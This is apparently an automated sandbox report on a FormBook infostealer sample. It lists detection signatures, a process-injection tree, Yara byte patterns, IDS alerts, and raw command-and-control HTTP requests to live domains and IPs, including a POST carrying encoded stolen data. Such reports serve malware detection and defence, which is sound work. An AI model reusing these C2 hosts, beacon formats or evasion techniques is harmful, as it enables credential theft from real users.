Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
lPX6PixV4t.exe

Overview

General Information

Sample name:lPX6PixV4t.exe
renamed because original name is a hash value
Original sample name:20c72b8fedc9a01361a10d32b510de20deaba414716db9fd6134f9eb8fe8747b.exe
Analysis ID:1529804
MD5:1f52b1deb6cbe7bfd6a5cf023069d858
SHA1:115636cc2304d78c8978d4295c288d06e28d489c
SHA256:20c72b8fedc9a01361a10d32b510de20deaba414716db9fd6134f9eb8fe8747b
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • lPX6PixV4t.exe (PID: 5044 cmdline: "C:\Users\user\Desktop\lPX6PixV4t.exe" MD5: 1F52B1DEB6CBE7BFD6A5CF023069D858)
    • svchost.exe (PID: 3508 cmdline: "C:\Users\user\Desktop\lPX6PixV4t.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • qvXzWppcWJ.exe (PID: 2168 cmdline: "C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • write.exe (PID: 2328 cmdline: "C:\Windows\SysWOW64\write.exe" MD5: 3D6FDBA2878656FA9ECB81F6ECE45703)
          • qvXzWppcWJ.exe (PID: 1588 cmdline: "C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 672 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000009.00000002.3363834268.0000000004A30000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000009.00000002.3363834268.0000000004A30000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x475fc:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x2f7ab:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000008.00000002.3354933145.00000000030F0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000008.00000002.3354933145.00000000030F0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13f6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000002.00000002.2563421707.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries
        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e2c3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16472:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2f0c3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17272:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\lPX6PixV4t.exe", CommandLine: "C:\Users\user\Desktop\lPX6PixV4t.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\lPX6PixV4t.exe", ParentImage: C:\Users\user\Desktop\lPX6PixV4t.exe, ParentProcessId: 5044, ParentProcessName: lPX6PixV4t.exe, ProcessCommandLine: "C:\Users\user\Desktop\lPX6PixV4t.exe", ProcessId: 3508, ProcessName: svchost.exe
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\lPX6PixV4t.exe", CommandLine: "C:\Users\user\Desktop\lPX6PixV4t.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\lPX6PixV4t.exe", ParentImage: C:\Users\user\Desktop\lPX6PixV4t.exe, ParentProcessId: 5044, ParentProcessName: lPX6PixV4t.exe, ProcessCommandLine: "C:\Users\user\Desktop\lPX6PixV4t.exe", ProcessId: 3508, ProcessName: svchost.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-09T12:42:55.053219+020028554651A Network Trojan was detected192.168.2.6499823.33.130.19080TCP
            2024-10-09T12:43:18.973790+020028554651A Network Trojan was detected192.168.2.64999123.224.37.7880TCP
            2024-10-09T12:43:32.782721+020028554651A Network Trojan was detected192.168.2.64999552.187.43.4080TCP
            2024-10-09T12:43:46.570817+020028554651A Network Trojan was detected192.168.2.650000199.192.21.16980TCP
            2024-10-09T12:44:00.019227+020028554651A Network Trojan was detected192.168.2.65000481.2.196.1980TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-09T12:43:11.318350+020028554641A Network Trojan was detected192.168.2.64998623.224.37.7880TCP
            2024-10-09T12:43:13.862896+020028554641A Network Trojan was detected192.168.2.64998723.224.37.7880TCP
            2024-10-09T12:43:16.407225+020028554641A Network Trojan was detected192.168.2.64998923.224.37.7880TCP
            2024-10-09T12:43:25.184455+020028554641A Network Trojan was detected192.168.2.64999252.187.43.4080TCP
            2024-10-09T12:43:27.668580+020028554641A Network Trojan was detected192.168.2.64999352.187.43.4080TCP
            2024-10-09T12:43:30.238313+020028554641A Network Trojan was detected192.168.2.64999452.187.43.4080TCP
            2024-10-09T12:43:38.961475+020028554641A Network Trojan was detected192.168.2.649996199.192.21.16980TCP
            2024-10-09T12:43:41.497091+020028554641A Network Trojan was detected192.168.2.649997199.192.21.16980TCP
            2024-10-09T12:43:44.040118+020028554641A Network Trojan was detected192.168.2.649999199.192.21.16980TCP
            2024-10-09T12:43:52.321727+020028554641A Network Trojan was detected192.168.2.65000181.2.196.1980TCP
            2024-10-09T12:43:54.851004+020028554641A Network Trojan was detected192.168.2.65000281.2.196.1980TCP
            2024-10-09T12:43:57.482058+020028554641A Network Trojan was detected192.168.2.65000381.2.196.1980TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: lPX6PixV4t.exeAvira: detected
            Source: http://www.1183377.app/8z5k/Virustotal: Detection: 6%Perma Link
            Source: lPX6PixV4t.exeReversingLabs: Detection: 66%
            Source: lPX6PixV4t.exeVirustotal: Detection: 40%Perma Link
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000002.3363834268.0000000004A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3354933145.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2563421707.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2563714383.0000000003690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2564107647.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3361592338.0000000004D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3361654877.0000000004DA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3360961972.0000000002E00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: lPX6PixV4t.exeJoe Sandbox ML: detected
            Source: lPX6PixV4t.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: write.pdbGCTL source: svchost.exe, 00000002.00000002.2563594838.0000000003212000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2563579741.0000000003200000.00000004.00000020.00020000.00000000.sdmp, qvXzWppcWJ.exe, 00000007.00000002.3360182557.0000000000788000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: write.pdb source: svchost.exe, 00000002.00000002.2563594838.0000000003212000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2563579741.0000000003200000.00000004.00000020.00020000.00000000.sdmp, qvXzWppcWJ.exe, 00000007.00000002.3360182557.0000000000788000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qvXzWppcWJ.exe, 00000007.00000000.2486177774.00000000004DE000.00000002.00000001.01000000.00000005.sdmp, qvXzWppcWJ.exe, 00000009.00000002.3360387466.00000000004DE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: lPX6PixV4t.exe, 00000000.00000003.2146892521.00000000047B0000.00000004.00001000.00020000.00000000.sdmp, lPX6PixV4t.exe, 00000000.00000003.2147643644.0000000004610000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2467157279.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2563747592.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2465322264.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2563747592.000000000399E000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000008.00000003.2563682485.0000000004C20000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000008.00000003.2565826270.0000000004E0B000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000008.00000002.3362085805.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000008.00000002.3362085805.000000000515E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: lPX6PixV4t.exe, 00000000.00000003.2146892521.00000000047B0000.00000004.00001000.00020000.00000000.sdmp, lPX6PixV4t.exe, 00000000.00000003.2147643644.0000000004610000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2467157279.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2563747592.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2465322264.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2563747592.000000000399E000.00000040.00001000.00020000.00000000.sdmp, write.exe, write.exe, 00000008.00000003.2563682485.0000000004C20000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000008.00000003.2565826270.0000000004E0B000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000008.00000002.3362085805.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000008.00000002.3362085805.000000000515E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: write.exe, 00000008.00000002.3364123267.00000000055EC000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000008.00000002.3357490643.0000000003355000.00000004.00000020.00020000.00000000.sdmp, qvXzWppcWJ.exe, 00000009.00000002.3362095361.00000000025FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2851599262.000000003CA5C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: write.exe, 00000008.00000002.3364123267.00000000055EC000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000008.00000002.3357490643.0000000003355000.00000004.00000020.00020000.00000000.sdmp, qvXzWppcWJ.exe, 00000009.00000002.3362095361.00000000025FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2851599262.000000003CA5C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_0310C340 FindFirstFileW,FindNextFileW,FindClose,8_2_0310C340
            Source: C:\Windows\SysWOW64\write.exeCode function: 4x nop then xor eax, eax8_2_030F9A60
            Source: C:\Windows\SysWOW64\write.exeCode function: 4x nop then pop edi8_2_030FDF50
            Source: C:\Windows\SysWOW64\write.exeCode function: 4x nop then mov ebx, 00000004h8_2_04EB04E8

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50003 -> 81.2.196.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49986 -> 23.224.37.78:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49982 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49993 -> 52.187.43.40:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49989 -> 23.224.37.78:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49997 -> 199.192.21.169:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50000 -> 199.192.21.169:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49991 -> 23.224.37.78:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50004 -> 81.2.196.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50002 -> 81.2.196.19:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49995 -> 52.187.43.40:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49994 -> 52.187.43.40:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49992 -> 52.187.43.40:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49996 -> 199.192.21.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50001 -> 81.2.196.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49987 -> 23.224.37.78:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49999 -> 199.192.21.169:80
            Source: DNS query: www.93187.xyz
            Source: Joe Sandbox ViewIP Address: 199.192.21.169 199.192.21.169
            Source: Joe Sandbox ViewIP Address: 81.2.196.19 81.2.196.19
            Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
            Source: Joe Sandbox ViewASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
            Source: Joe Sandbox ViewASN Name: CNSERVERSUS CNSERVERSUS
            Source: Joe Sandbox ViewASN Name: INTERNET-CZKtis238403KtisCZ INTERNET-CZKtis238403KtisCZ
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
            Source: global trafficHTTP traffic detected: GET /i7xp/?rtR8=1hYOXgym/+H9levAkr4ECV6rOYKZY3gLAuBEPSFmNBWW1UoBGm7krMakoIf2T8PCbakGk5cJYsK9Iz90f+Byzfi/m2yAgZsx+DVOuREzU+smRqm89Sbv2/YQlh4Vkdpr1W2vE6w=&0Xm=T0UhHtW0dnoXGz2p HTTP/1.1Host: www.whats-in-the-box.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /8z5k/?rtR8=y1aGUeBTtCWB8PYjxeZy4U2j9UMFcfikuJGyOOgv6AsofEnOPQxTGp57UW4jl24PiU2QUCC/WnCbrv11FxPlelKyqXg1oGGxy+JCqs86Q0OsQshvX6rpzC0a99GPlHxBY6RTMFs=&0Xm=T0UhHtW0dnoXGz2p HTTP/1.1Host: www.1183377.appAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /4i87/?rtR8=tX1gPPm4vGDAfdGb/LV0WNIl4Jkrf3fdzqWbffI0WxOtalbv2UCR6RvwOqtQuPJgvEbTjd3YUbROaC6Ux6KVtYIHl0Afz9YtPbMVCSGGc6Kk1GcbeTEHqh6wASkybV6fO9grfsM=&0Xm=T0UhHtW0dnoXGz2p HTTP/1.1Host: www.52ywq.vipAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /d8cw/?rtR8=ygF20N1+ik7kBOtBXXgSSDl+0mvoPS6R8XEst5j0lvkfFXMCnxh1w4hdkVa8euGiR7K2W9wNoXO2NDH8py5opn2u7JXGpupl6T4qEm+uZVqNQYYUUMV8Z2PKg+70/6v6dkPbd3Q=&0Xm=T0UhHtW0dnoXGz2p HTTP/1.1Host: www.zenscape.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /jsqu/?0Xm=T0UhHtW0dnoXGz2p&rtR8=j6JGavFFAQYaoSsk3MdZismLyTuecDBS/zrFTn0tpA7YEGIVc6EsUszyewNJDeJ1aRTf+dmReaRifudBLpLuEFCvWuSXUwpZ7h17BCkWHwRJfu54vPrIhvPMzvKdYKZDJ4eC1+o= HTTP/1.1Host: www.asociacia.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.whats-in-the-box.org
            Source: global trafficDNS traffic detected: DNS query: www.1183377.app
            Source: global trafficDNS traffic detected: DNS query: www.52ywq.vip
            Source: global trafficDNS traffic detected: DNS query: www.zenscape.top
            Source: global trafficDNS traffic detected: DNS query: www.asociacia.online
            Source: global trafficDNS traffic detected: DNS query: www.93187.xyz
            Source: unknownHTTP traffic detected: POST /8z5k/ HTTP/1.1Host: www.1183377.appAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USAccept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedCache-Control: no-cacheConnection: closeContent-Length: 209Origin: http://www.1183377.appReferer: http://www.1183377.app/8z5k/User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36Data Raw: 72 74 52 38 3d 2f 33 79 6d 58 72 5a 75 73 51 2f 74 72 2b 34 33 68 4f 5a 54 39 46 6d 68 35 33 41 64 48 38 6d 51 6b 64 75 67 41 4e 49 5a 7a 58 52 62 4a 55 66 55 5a 46 6c 49 45 4b 64 32 61 43 38 68 6c 46 42 2f 76 53 65 57 63 78 32 30 58 44 43 36 6e 63 70 6e 45 78 61 65 5a 78 57 33 67 57 4a 71 6d 42 36 57 75 4f 78 73 72 36 55 55 56 30 37 6b 53 2b 56 68 64 5a 6e 47 31 43 6f 42 35 50 61 72 6f 79 78 48 46 4d 51 58 4e 41 2f 6a 62 5a 78 4b 43 39 72 6e 50 49 72 6a 37 6d 35 61 37 67 45 63 45 4f 68 75 37 5a 66 4f 4f 35 48 38 41 77 55 46 74 32 34 68 37 2f 55 52 6a 77 66 53 39 45 39 65 46 76 4b 32 42 63 76 31 4b 51 53 56 6d 6c 47 41 Data Ascii: rtR8=/3ymXrZusQ/tr+43hOZT9Fmh53AdH8mQkdugANIZzXRbJUfUZFlIEKd2aC8hlFB/vSeWcx20XDC6ncpnExaeZxW3gWJqmB6WuOxsr6UUV07kS+VhdZnG1CoB5ParoyxHFMQXNA/jbZxKC9rnPIrj7m5a7gEcEOhu7ZfOO5H8AwUFt24h7/URjwfS9E9eFvK2Bcv1KQSVmlGA
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 10:43:38 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 774X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 